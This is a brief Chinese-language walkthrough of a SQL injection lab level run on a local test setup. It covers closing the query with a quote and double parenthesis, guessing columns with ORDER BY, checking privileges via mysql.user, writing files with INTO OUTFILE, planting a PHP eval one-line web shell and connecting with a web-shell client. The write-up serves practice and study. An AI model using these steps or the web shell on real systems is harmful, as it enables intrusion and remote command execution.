开始挑战第一关(Error Based- String)
开始之前,先介绍这关需要用到的几个函数,如下图
继续访问我们的地址,输入' “ 一些测试语句发现都没有反应
查看源码,是采用了单引号和双括号
这样一来就好办了,就直接利用我们的闭合来测试
继续使用order by猜解字段名,正确的数据是3个
上union select联合查询
靠,又没有报错,那就只能使用上面的函数来进行了,
先判断下权限 and (select count(*) from mysql.user)>0,为什么是mysql.user表,因为所有的用户都是存在mysql.user中的,返回正确
利用 into outfile导出文件到一个txt文件中 ,使用outfile需要root权限,并且需要绝对路径,这里我是采用的本地搭建,就直接利用本地的路径了(这里为什么会提示sql语法错误,研究了很久,是出现在环境上,我是自己安装的apache和msyql)
查看是否写入成功,发现已成功
写入一句话进去<?php @eval($_POST['cmd']);?>成jpg图片,将一句话转换成16进制
然后再使用load_file加载成php
菜刀成功链接
